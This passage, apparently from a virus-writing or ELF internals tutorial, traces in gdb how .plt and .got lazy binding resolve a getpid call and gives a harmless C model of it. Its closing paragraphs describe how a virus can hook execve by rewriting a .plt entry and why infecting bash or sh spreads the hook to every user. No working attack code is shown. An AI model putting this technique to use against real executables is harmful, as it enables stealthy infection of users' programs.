This is the basic structure of a .plt entry. The first jmp jumps to the address stored at 0x80494E8. That location is part of the .got table, and at load time it holds the value 0x804837E, that is, the address of the push instruction that follows the jmp.

      (gdb)x 0x80494e8
      0x80494e8 <__DTOR_END__+16>:  0x0804837e

As this is the first time getpid is called in the executable, it has to jump to the dynamic linker to obtain the address of the function in the library. To do so it executes push 0x0, where 0x0 is the offset into the relocation area that tells the dynamic linker which .got entry it has to modify. Then it executes jmp 0x8048368, where 0x8048368 is the address of the first entry of the .plt section. The first entry of the .plt is special, because it is only used to call the dynamic linker. If we continue debugging, we'll see the structure of the first .plt entry.

      0x8048368 <_init+8>:  pushl 0x80494e0
      0x804836e <_init+14>: jmp   *0x80494e4

First, it pushes the contents of address 0x80494E0, which is the second entry in the .got table, and then it jumps to the address contained in 0x80494E4 (the third entry of the .got). The first three entries of the .got don't contain pointers into the .plt at load time; they are special entries. The first one contains a pointer to the .dynamic section, and the third one is filled with a pointer to the entry point of the dynamic linker.

      (gdb)x 0x80494e4
      0x80494e4 <__DTOR_END__+12>: 0x40004180

So if we continue tracing, we'll see the code of the dynamic linker, which already lives in the memory space of the libraries. When the program returns from the call, the linker will have stored the absolute address of the function in the .got entry corresponding to getpid. If we continue tracing to the second call to getpid, we can see the new value in the .got section.

      (gdb)x 0x80494e8
      0x80494e8 <__DTOR_END__+16>:  0x40073000

So, with the instruction jmp *0x80494E8 we jump directly to the function without calling the dynamic linker.
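The resolve-on-first-call behaviour traced above can be modelled in plain C with a function pointer. This is only a toy model under stated assumptions, not the real dynamic linker: got_slot stands in for the .got entry of getpid, lazy_stub for the path through the first .plt entry, and real_function for the function inside libc. All of these names are invented for the sketch.

```c
typedef int (*func_t)(void);

static int resolver_calls = 0;       /* how many times the "linker" ran */

/* Stands in for the real function inside the library. */
static int real_function(void)
{
    return 42;
}

static int lazy_stub(void);

/* One-entry model of the .got: at "load time" it points back at the stub. */
static func_t got_slot = lazy_stub;

/* Model of the slow path: resolve the reference, patch the slot,
   then continue into the real function. */
static int lazy_stub(void)
{
    resolver_calls++;
    got_slot = real_function;        /* later calls skip the resolver */
    return real_function();
}

/* Model of the .plt entry: always an indirect jump through the slot. */
int call_through_plt(void)
{
    return got_slot();
}

/* Reports how often the resolver was entered. */
int resolver_call_count(void)
{
    return resolver_calls;
}
```

Calling call_through_plt() twice returns 42 both times, but resolver_call_count() reports 1: only the first call goes through the stub, just as only the first getpid call reaches the dynamic linker.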

This mechanism allows calls to be hooked inside the process's own memory; this is what is called PerProcess residency. A virus using this mechanism can hook, for example, the execve call, by modifying the .plt entry that corresponds to that call, replacing the jmp *address_in_got with a jmp *virus_address. However, the virus, running in Ring-3, is still bound by the usual file access limitations, and can only infect the files the user has access to. Another limitation is that it only hooks calls in contaminated files. Clean files being executed won't have their calls hooked by the virus.

However, the possibilities of this method are really impressive: if a command interpreter like bash or sh is infected, then, because these are commands executed by all users, a PerProcess hook of execve could be as effective as global residency.